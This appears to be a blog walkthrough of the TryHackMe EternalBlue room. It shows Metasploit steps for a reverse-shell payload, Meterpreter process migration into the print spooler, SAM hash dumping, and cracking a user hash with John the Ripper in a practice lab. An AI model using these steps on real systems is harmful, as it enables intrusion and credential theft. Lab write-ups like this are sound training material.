
TryHackMe \ Exploiting EternalBlue


Today is wind-down Friday with minimal study planned for today and this weekend, so I thought I should get back into TryHackMe and look at some basic Windows vulnerabilities.

I've had an on-off relationship with TryHackMe, but today I am going to stick with it and see how far I get.


20 minutes in and BOOOOOM, we have exploited our Windows machine with the EternalBlue exploit (MS17-010, a remote code execution bug in SMBv1).


Tell me this isn't a beautiful sight! I am at the Windows command prompt, having set the payload in Metasploit to:


set payload windows/x64/shell/reverse_tcp


Once I upgraded my shell session to Meterpreter, I can see I am NT AUTHORITY\SYSTEM.


OK, let's now migrate to spoolsv.exe on PID 2028 (the PID will differ on your machine, so check ps first). The print spooler runs as SYSTEM and is a long-lived service process, so the session survives even if the process we landed in dies.


migrate 2028


I am now living in the print spooler process!


Next we use hashdump in Meterpreter to dump the Windows account password hashes from the SAM. Each line comes out as user:RID:LM hash:NT hash:::, and the dump only works because the session is running as SYSTEM.


Right, let's see if we can crack this user's password. I opened a new terminal window and created a new file:


touch jon.hash


Then I opened the file with nano, pasted in the NT hash from the previous terminal and saved it with CTRL+O. Checking the file contents:


cat jon.hash


Next I ran John the Ripper in the terminal to try and crack the password.


The last thing to do on this vulnerable machine is to find the flags that have been dotted around Windows. Jumping back to the Meterpreter terminal window, we can check where we are:


pwd


and move to the root of the C drive (two levels up from System32) with:


cd ..

cd ..


pwd


ls


I found flag 1 in the root of the C drive.


Flag 2 was found in :


Windows\System32\Config


And flag 3 in:


Users\Jon\Documents


Each of the flags can be read with, for example:


cat flag1.txt

making sure you are in the correct directory first, obviously!


Conclusion

One of the beginner rooms on TryHackMe, but a good place to start, and I found it fun. You know you're a total geek when you actually shout "YES" on seeing the Windows command prompt for the first time, like I did!!!!



